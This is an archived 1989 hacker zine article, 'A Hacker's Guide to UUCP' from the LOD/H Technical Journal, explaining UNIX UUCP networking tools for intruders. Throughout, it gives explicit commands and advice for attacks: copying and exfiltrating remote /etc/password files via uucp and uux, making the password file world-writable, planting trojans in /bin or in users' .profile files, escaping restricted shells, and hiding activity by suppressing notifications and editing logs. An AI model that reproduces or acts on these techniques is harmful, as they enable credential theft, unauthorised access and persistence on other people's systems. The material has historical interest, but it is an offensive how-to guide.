home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / miscpub1 / lodtj4.5 < prev    next >
Text File  |  1992-09-26  |  28KB  |  563 lines

  1. The LOD/H Technical Journal, Issue #4: File 05 of 10
  2.  
  3.  
  4.              =====================================================
  5.              ||                                                 ||
  6.              ||            A Hacker's Guide to UUCP             ||
  7.              ||                                                 ||
  8.              ||                        by                       ||
  9.              ||                                                 ||
  10.              ||                    The Mentor                   ||
  11.              ||                                                 ||
  12.              ||              Legion of Doom/Hackers             ||
  13.              ||                                                 ||
  14.              ||                     08/04/89                    ||
  15.              ||                                                 ||
  16.              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  17.  
  18. Scope
  19. ~~~~~
  20.  
  21.    Part I of this file is intended for the casual hacker- someone
  22. familiar with UNIX commands, but who hasn't had extended experience
  23. with the UUCP network.  Part II will be intended for the advanced
  24. hacker who has the confidence and knowledge to go out and modify
  25. a UNIX network- the logs, the paths, the permissions, etc...
  26.  
  27.  
  28. Introduction
  29. ~~~~~~~~~~~~
  30.    
  31.    Like it or not, UNIX is the most popular operating system in the
  32. world.  As a hacker, you are likely to run into several hundred
  33. UNIX machines over the course of your hacking career.  Knowing how
  34. to move around and use the UNIX environment should be considered
  35. absolutely essential, especially since UNIX is the operating system
  36. of choice among phone company computers. 
  37.  
  38.    This article is not an attempt to teach you how to use UNIX. 
  39. If you don't know what a '$ls -x > dir' does, you need to put this
  40. article in your archives, get a good basic file on UNIX (or buy a
  41. book on it- there are several good ones out ((see the Bibliography
  42. at the end of this file for suggestions))), read it, and then play
  43. around some in a UNIX machine.  Please!  If you have managed to
  44. stumble into a Bell system, do *not* use it as a machine to learn
  45. UNIX on!  You *will* get noticed by security, and this will lead
  46. not only to the security being tightened, but may well lead to Bell
  47. Security going through your underwear drawer.
  48.  
  49.    The information in this article is mainly concerning AT&T System
  50. V UNIX.  I have included BSD 4.3 & Xenix information also in cases
  51. that I was able to determine alternate procedures.  All information
  52. has been thoroughly tested and researched on as many machines as
  53. possible.  Standard disclaimer, your system may be slightly
  54. different.
  55.  
  56. Glossary & Usage
  57. ~~~~~~~~~~~~~~~~
  58.  
  59. BNU     - Basic Networking Utilities.  System V.3's uucp package.
  60. daemon  - A program running in the background.
  61. LAN     - Local Area Network.
  62. network - A group of machines set up to exchange information and/or
  63.           resources.
  64. node    - A terminating machine on a network.
  65. UUCP    - When capitalized, refers to the UNIX networking utilities
  66.           package.
  67. uucp    - In lower case, refers to the program Unix-to-Unix-CoPy.
  68.  
  69. I. General Information
  70.    ~~~~~~~~~~~~~~~~~~~
  71.  
  72.    A. What is UUCP?
  73.  
  74.    UUCP is a networking facility for the UNIX operating system. 
  75. It is made up of a number of different programs that allow UNIX
  76. machines to talk to each other.  Using UUCP, you can access a
  77. remote machine to copy files, execute commands, use resources, or
  78. send mail.  You can dial out to other non-UNIX computers, and you
  79. can access public mail/news networks such as USENET.
  80.  
  81.    B. History of UUCP
  82.  
  83.    The first UUCP system was built in 1976 by Mike Lest at AT&T
  84. Bell Labs.  This system became so popular that a second version was
  85. developed by Lesk, David Nowitz, and Greg Chesson.  Version 2 UUCP
  86. was distributed with UNIX Version 7.
  87.  
  88.    With System V Release 3, a new version of UUCP that was
  89. developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E.
  90. Redman.  This version is known as either HoneyDanBer UUCP (from the
  91. last names of the developers), or more conventionally as Basic
  92. Networking Utilities (BNU).  I will stick with BNU, as it is easier
  93. to type.  BNU is backward compatible with Version 2, so there is
  94. no problem communicating between the two.
  95.  
  96.    BSD 4.3's UUCP release incorporates some of the BNU features,
  97. but retains more similarity to Version 2 UUCP.
  98.  
  99.    If you are unsure about which version of UUCP is on the system
  100. that you are in, do a directory of /usr/lib/uucp and look at the
  101. files.  If you have a file called L.sys, you are in a Version 2
  102. system.  If there is a file called Systems, then it's BNU.  See
  103. Table 1 for a fairly complete listing of what system runs what UUCP
  104. version.
  105.  
  106.  
  107.                                 Table 1*
  108.                                 ~~~~~~~
  109. Manufacturer              Model            UNIX/UUCP Version     
  110.                   
  111. _____________________________________________________________    
  112. |                |                        |                  |   
  113. | Apollo         |   3000 Series (Domain) | BSD 4.2/Version 2|   
  114. | Altos          |   All models           | Xenix/Version 2  |   
  115. | AT&T           |   3B1 (UNIX PC)        | System V.2/Vers.2|   
  116. | AT&T           |   3B2                  | System V.3/BNU   |   
  117. | AT&T           |   3B15                 | System V.3/BNU   |   
  118. | Convergent     |   Miniframe (CTIX)     | System V.2/Vers.2|   
  119. | Technologies   |   Mightframe (CTIX)    | System V.3/BNU   |   
  120. | DEC            |   MicroVAX             | Ultrix/Vers. 2 + |   
  121. | DEC            |   VAX                  | BSD 4.3/Vers. 2 +|   
  122. | Encore         |   Multimax             | System V.3/BNU   |   
  123. | IBM            |   PC-RT (AIX)          | System V.2/Vers.2|   
  124. | Masscomp       |   MC-5000 Series       | System V.3/BNU   |   
  125. | Microport      |   PC/AT                | System V.2/Vers.2|   
  126. | NCR            |   Tower 32/16          | System V.2/Vers.2|   
  127. | Prime          |   EXL Series           | System V.2/Vers.2|   
  128. | Pyramid        |   90x                  | BSD 4.2/Version 2|   
  129. | SCO/Xenix      |   PC/XT                | System V.2/Vers.2|   
  130. | Unisys         |   5000 & 7000 Series   | System V.2/Vers.2|   
  131. |                |                        |                  |   
  132. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
  133. *  This table is slightly outdated.  Some of the systems may have
  134.    upgraded since this article was written.
  135.  
  136.  
  137. II. UUCP Communications
  138.     ~~~~~~~~~~~~~~~~~~~
  139.  
  140.     A. Overview of UUCP User Programs
  141.  
  142.     There are a number of programs that are used by a UUCP
  143. communication network.  Some are standard UNIX programs, others are
  144. exclusively part of the UUCP package.
  145. ................................................................. 
  146.   
  147.         These three are standard UNIX commands:
  148.  
  149.         mail-   UNIX's mail facility can be used to send messages
  150.                 to other systems on a UUCP network.
  151.         cu-     Connects you to a remote machine and allows you to
  152.                 be logged in simultaneously to both machines.  Also
  153.                 allows you execute commands on either machine    
  154.                 without dropping the link.
  155.         tip-    (BSD) same as cu.
  156.  
  157.                                +++
  158.  
  159.         There are five main programs within UUCP:
  160.  
  161.         uucp-   Does all the setup for a remote file transfer.   
  162.                 uucp creates files that describe the file transfer
  163.                 (called 'work' files), then calls the uucico daemon
  164.                 to do the actual work. 
  165.         uux-    Used to execute commands on a remote machine.  uux
  166.                 performs similar to uucp, except that commands are
  167.                 processed instead of files.
  168.         uuname- Used to list the names of other systems that are
  169.                 connected to your network.
  170.         uulog-  Displays the uucp log for the specified machine. 
  171.                 I'll be showing how to cover your uucp tracks from
  172.                 this later in the article.
  173.         uustat- Gets the status of uux requests.  Also lets you  
  174.                 manipulate the contents of a UUCP queue.
  175.  
  176.                                    +++
  177.  
  178.         System V also has two additional programs:
  179.  
  180.         uuto-   Allows you to send files to another user similar
  181.                 to the UNIX mail command.
  182.         uupick- Allows you to read files sent to you with uuto.
  183.  
  184.                                    +++
  185.  
  186.         BSD 4.3 has two additional programs:
  187.  
  188.         uuq-    Lets you view & manipulate UUCP jobs that are    
  189.                 waiting to be processed, similar to System V's   
  190.                 uupick program. 
  191.         uusend- Lets you forward files through a string of systems.
  192.  ..................................................................
  193.  
  194. III. Using the Programs
  195.      ~~~~~~~~~~~~~~~~~~
  196.  
  197.      A. uuname
  198.  
  199.      This one is easy & friendly.  All you do is type '$uuname'.
  200. It will spit out a list of all systems on your network.  If you
  201. aren't sure about the name of your local system, invoke uuname with
  202. the -l option. ($uuname -l).
  203.  
  204.      B. mail
  205.  
  206.      I'm not going to say to much about mail, as it isn't a program
  207. that you will use much as a hacker except possibly to break out of
  208. a shell.  Sending mail to other people is not a good way to stay
  209. hidden, as all mail transfer to remote systems is logged (no, they
  210. may not read the mail, but they're likely to notice that the
  211. unassigned ADMIN account is suddenly getting mail from all over the 
  212. world...)  These logs can be modified, however.  This will       
  213. be covered in Part II.
  214.  
  215.      Briefly, mail is invoked with the command 'mail username' (or
  216. mailx under some systems).  If you wish to send mail to user john
  217. on the system you're on, you would type:
  218.  
  219. mail john
  220. Dear John-
  221.      This is mail.  Enjoy it.
  222. ^D   (usage note, this means control-D)
  223.  
  224.      To send mail to a user on a remote system, or a string of
  225. systems, you would use the ! key to indicate a remote system name. 
  226. If you were on node Alpha and wanted to send mail to john on node
  227. Beta, you would address your mail to 'mail Beta!john'.  If you
  228. wanted to send mail to a user on system that's not connected to
  229. yours, but *is* connected to a machine you are connected to, you
  230. would string together the system names, separated by a !. For
  231. example, if node Saturn was connected to Beta, but not to Alpha,
  232. you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'.
  233.  
  234.      Please note- If you are running the C-Shell or Bourne Shell,
  235. you will have to prefix the ! with a \.  i.e. 'mail Beta\!Saturn\!susan'.
  236. Also, the mail header displays the system name, return path, and account
  237. name that you send mail from, so don't try to anonymously mail someone
  238. a message- it won't work.
  239.  
  240.      Another quick feature (this is under the 'basic unix
  241. knowledge' category), if you want to mail a file named 'message'
  242. to someone, you'd type the following - '$mail Beta!Saturn!susan <
  243. message'.
  244.  
  245.      Finally, as mentioned above, it may be possible to break out
  246. of a restricted shell within mail.  Simply send mail to yourself,
  247. then when you enter mail to read the message, type !sh to exit from
  248. mail into shell. This will often blow off the restricted shell.
  249.  
  250.  
  251.      C. File Transfer
  252.  
  253.      One of the first things that you will want to do when you
  254. discover that you're on a network (uuname, remember?) is to grab
  255. a copy of the /etc/password file from the systems on the net then
  256. run Shooting Shark's password hacking program from TJ Issue #2. 
  257. Even if you have no use for it now, save it & label it, you never
  258. know when you might need to get into that system. Besides, when
  259. printed, they make fun & interesting wallpaper.
  260.  
  261.      Unfortunately, the /etc/ directory will sometimes have access
  262. restricted.  You can get around this by copying the /etc/password
  263. file to the /usr/spool/uucppublic directory using the uux command
  264. (see below).  If the uux program has restrictions on in, then you
  265. may have to actually hack into the remote system using the rlogin
  266. command.  Be persistent.
  267.  
  268.      UUCP is also useful in that it allows you to send a file from
  269. your system to a remote system.  Got a nice little trojan you need
  270. to insert on their system?  Use UUCP to drop it into the /bin/
  271. directory.  Or if they protected the /bin/ directory (likely, if
  272. they have half a brain), they might have forgotten to protect all
  273. of the users private directories (i.e. /usr/mike or /usr/susan or
  274. sometimes even /usr/admin).  UUCP a copy of a .profile file to your
  275. system, insert your own stuff in it, then UUCP it back to its
  276. original directory where the user will access it the next time he
  277. logs in.  People rarely $cat their .profile file, so you can
  278. usually get away with murder in them.
  279.  
  280.      While uucp has some limitations, it has the advantage of being
  281. present on every UUCP system in the world.  If you're on a System
  282. V, you will probably use uuto & uupick much more frequently, as
  283. it's easier to do subtle hacks with them.  But if uucp is all you
  284. have, remember, you're a hacker.  Show some ingenuity.  The syntax
  285. of uucp when sending a file is:
  286.  
  287. $uucp [options] <local source> <remote destination> 
  288.  
  289.      For example, you have a program sitting in your working
  290. directory on node Alpha called 'stuff', and you want to plop it
  291. into the /usr/spool/uucppublic/mike/ directory of node Beta.  The
  292. command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'. 
  293. (Don't forget to add a slash in front of the exclamation point if
  294. you're in C-Shell or Bourne!)  A good thing to know that will save
  295. you some typing is that the /usr/spool/uucppublic/ directory can
  296. be abbreviated as ~/ (in KSH only), so that the above command could look
  297. like '$uucp stuff Beta!~/mike/'.  You can also specify a path other than
  298. ~/.  If you wish to drop your 'new & improved' version of the
  299. /etc/password file into the /etc/ directory, you could do a '$uucp
  300. password Beta!/etc/'.  Just don't be surprised if it gets bounced
  301. with a message similar to the following:
  302.  
  303.                 From uucp Sat Dec 24 23:13:15 1988
  304.                 Received: by Beta.UUCP (2.15/3.3)
  305.                 id AA25032; Sat Dec 24 23:13:15 edt              
  306.                 Date: Sat Dec 24 23:13:15 edt
  307.                 From: uucp
  308.                 Apparently to: hacker
  309.                 Status: R
  310.  
  311.                 file /etc/password, system Beta
  312.                 remote access to path/file denied
  313.  
  314.      Another hacker-friendly feature of UUCP is the ability to copy
  315. something into a remote user's login directory by entering a ~
  316. character before the username.  For example, to dump a modified
  317. .profile file into a user on Beta named alex, you would do the
  318. following:
  319.  
  320.  
  321.         '$uucp .profile Beta!~alex'
  322.  
  323. The syntax for uucp when receiving a remote file is:
  324.  
  325. $uucp [options] <remote path> <local directory>
  326.  
  327. For example, you wish to grab Beta's password file and put it in
  328. a subdirectory called tmp in the account 'hacker' on node Alpha. 
  329. The command would be:
  330.  
  331. '$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'.
  332.  
  333. The same things concerning use of tildes (~) demonstrated in
  334. sending files applies when receiving them. The following table
  335. contains valid options to the uucp command.
  336.  
  337.  
  338.                                     Table 2
  339.                                     ~~~~~~~
  340.                _________________________________________________
  341.                |                                               |
  342.                |  -C Copy the local source file to the spool   |
  343.                |     directory before attempting the trans-    |
  344.                |     fer.                                      |
  345.                |                                               |
  346.                |  -f If the directory doesn't exist, abort the |
  347.                |     transfer.  Normally uucp will create any  |
  348.                |     non-existent directories, which is bad    |
  349.                |     technique if you're a good hacker...      |
  350.                |                                               |
  351.                |  -j Display the UUCP job request number. This |
  352.                |     is useful if you're going to use uustat   |
  353.                |     to manipulate & reroute UUCP requests in  |
  354.                |     the queue.                                |
  355.                |                                               |
  356.                |  -m Notify sender by mail when copy is done.  |
  357.                |     Potentially hazardous, as incoming mail   |
  358.                |     is logged.  Later on I'll show how to     |
  359.                |     modify that log...                        |
  360.                |                                               |
  361.                |  -n<username> Notify the user specified on    |
  362.                |     the remote system when the xfer is done.  |
  363.                |     I assume everyone sees how foolish this   |
  364.                |     would be, right?                          |
  365.                |                                               |
  366.                |  -r Queue the job, but do not contact remote  |
  367.                |     system immediately.  Can't see any pros   |
  368.                |     or cons in using this one...              |
  369.                |                                               |
  370.                |  -s<filename> Pipe the UUCP status messages   |
  371.                |     to filename. Useful if you wish to log    |
  372.                |     off & then check the progress later.      |
  373.                |                                               |
  374.                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  375.  
  376.      D. Executing Remote Commands
  377.  
  378.      The uux program allows users to execute a program on another
  379. system on the network.  While in theory this is the most useful
  380. command a hacker can use, in practice it is usually heavily
  381. restricted- any system administrator with half a brain realizes
  382. that letting people execute any command they like from across the
  383. country is not the way to maintain system integrity.
  384.  
  385.      There are, however, some useful things that can be done with
  386. uux even if the sysadmin has protected the things that *he* thinks
  387. are dangerous (remember, he's not a hacker, you are.  You are
  388. smarter, more persistent, and much cleverer than he is.  He doesn't
  389. like coming to work every day, can't wait to leave, and will do the
  390. minimum possible to get by.  You're different. You're dedicated &
  391. tricky.  You *like* what you're doing.  If you don't, get the hell
  392. out & let others who do take over.  End of the pep talk.)        
  393.  
  394.      The format for the uux command is:
  395.  
  396. $uux [options] command-string.
  397.  
  398. See Table 3 below for a list of options.
  399.  
  400.      Ok, ideal case.  The System manager of Beta is an idiot who
  401. has left all possible commands open, and the uucico daemon has root
  402. privs.  Let's say you want to alter the protection of the password
  403. file, copy it into the ~/ (public, remember?) directory, then copy
  404. it over to your system.  The sequence of commands would be:
  405.  
  406. $uux Beta!chmod 777 /etc/password
  407. $uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt        
  408. $uucp Beta!~/info.txt /usr/hacker/
  409.  
  410.      The first line would modify the protection where anyone could
  411. get to it, the second line would copy it into the ~/ directory, and
  412. the third line would send it along to you.
  413.  
  414.      Unfortunately, most commands are disabled (useful ones like
  415. chmod and cat and ls, at least.)  But sometimes you can get around
  416. that.  For instance, often you might not be able to ls or cp the
  417. password file.  But very rarely will mail be disabled.  So if you
  418. wanted a copy of the password file, you have them mail you one:
  419.  
  420. $uux Beta!mail Alpha!hacker < /etc/password
  421.  
  422.      Later in the UUCP Administration section, I'll explain how to
  423. modify the remote system so any command you want is executable.
  424.  
  425.      When you execute a remote command, UUCP will automatically
  426. send you mail telling you how it went.  It's a good idea to check
  427. the logs and see if there's anything you need to remove to cover
  428. your presence (this subject will be covered in Part II).
  429.  
  430.      If you are executing a command that is going to need data from
  431. a file, you specify that the file is on your local system by
  432. prefacing it with a \!.  I can't think of many reasons to use this,
  433. but perhaps you can.  As an example, let's say you wanted to print
  434. a file in your directory called 'stuff' out on a remote laser
  435. printer (bad hacking practice, and difficult to retrieve.) Do this:
  436.  
  437. $uux Beta!lp -dlaser \!stuff
  438.  
  439.      If the command you want to execute (whodo in this example) is
  440. forbidden, you will get a notification message similar to the
  441. following:
  442.  
  443. From uucp Sat Dec 24 23:12:15 EDT 1988
  444. >From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta
  445. Status: R0
  446. uuxqt cmd (whodo) status (DENIED)
  447.  
  448.      If you are going to need the standard output for a command,
  449. pipe it into ~/.  And any files or processes created by uux will
  450. belong to the user uucp, not to you.
  451.  
  452.                                    Table 3
  453.                                    ~~~~~~~
  454.         __________________________________________________________       
  455.         |                                                        |       
  456.         |   -a<username>  Notify user username when completed.   |       
  457.         |                                                        |       
  458.         |   -b  Print the Standard Input when the exit status    |       
  459.         |       indicates an error.                              |       
  460.         |                                                        |       
  461.         |   -c  Do not copy files to the spool directory (I      |       
  462.         |       recommend this one...too big a chance of someone |       
  463.         |       glancing in the spool dir.                       |       
  464.         |                                                        |       
  465.         |   -g<char or num> Sets the priority of the transfer.   |       
  466.         |       The lower alphabetically or numerically that     |       
  467.         |       the char or num is, the faster the process will  |       
  468.         |       be executed.  i.e.  -ga or -g2 will go faster    |       
  469.         |       than -gr or -g8.                                 |       
  470.         |                                                        |       
  471.         |   -j  Print the UUCP job number.  Useful if you're     |       
  472.         |       going to be playing with the queue.              |       
  473.         |                                                        |       
  474.         |   -I  (BSD Only) Make a link from the original file to |       
  475.         |       the spool dir.  I'm not sure what this is for.   |       
  476.         |                                                        |       
  477.         |   -L  (BSD Only) Start up the uucico daemon.           |       
  478.         |                                                        |       
  479.         |   -n  Don't notify by mail.  Recommended if you don't  |       
  480.         |       have the authority or knowledge to modify the    |       
  481.         |       system mail logs.                                |       
  482.         |                                                        |       
  483.         |   -p  Use Standard Input                               |       
  484.         |                                                        |       
  485.         |   -r  Queue the job but don't start uucico.            |       
  486.         |                                                        |       
  487.         |   -s<filename> Send transfer status to file filename.  |       
  488.         |                                                        |       
  489.         |   -x<0..9> Set level of debugging information.         |       
  490.         |                                                        |       
  491.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  492.  
  493.      E. uustat & uulog
  494.  
  495.      These two programs are used to track UUCP jobs and examine
  496. their status.
  497.  
  498.      uustat prints out a one-line summary for each job, telling you
  499. if the job is finished or the job is queued.  Older versions of
  500. uustat will have the job state as either JOB DELETED or JOB IS
  501. QUEUED.  The output of uustat will look like the following:
  502.  
  503. $uustat
  504.  
  505.    1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED       
  506.    1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED       
  507.     |      |     |        |           |             |
  508.     |      |     |        |           |             |
  509.   job #   user  node  start-time  status-time    job-status
  510.  
  511. See Table 4 for a list of options for the uustat command.
  512.  
  513.      uulog is a more thorough version of uustat, as it tracks the
  514. status messages logged by the system as your job proceeded through
  515. the system.  See Table 5 for options of the uulog command.
  516.  
  517.                                   Table 4*
  518.                                   ~~~~~~~
  519.             _________________________________________________    
  520.             |                                               |    
  521.             |  -a  report all queued jobs.                  |    
  522.             |                                               |    
  523.             |  -k<job#> kill job # job#.                    |    
  524.             |                                               |    
  525.             |  -m  report if another system is accessible.  |    
  526.             |                                               |    
  527.             |  -q  report the number of jobs queued for     |    
  528.             |      all systems on the net.                  |    
  529.             |                                               |    
  530.             |  -s<system> report the status of jobs for     |    
  531.             |      the system named systemname.             |    
  532.             |                                               |    
  533.             |  -u<username> report the status of jobs for   |    
  534.             |      user username.                           |    
  535.             |                                               |    
  536.             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    
  537.             * There are several other options such as -o and     
  538.               -y that are system specific, and aren't really     
  539.               that useful to begin with.
  540.  
  541.  
  542.                                   Table 5
  543.                                   ~~~~~~~
  544.                         ______________________________
  545.                         |                            |
  546.                         |  -s<system> same as uustat |
  547.                         |                            |
  548.                         |  -u<userid> same as uustat |
  549.                         |                            |
  550.                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  551.  
  552. ******************************************************************
  553.  
  554. This marks the end of Part I.  If time permits a Part II will be in
  555. the next LOD/H Technical Journal.
  556.  
  557. (c) 1989   The Mentor
  558.            Legion of Doom/Legion of Hacker
  559.  
  560. ******************************************************************
  561.  
  562. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  563.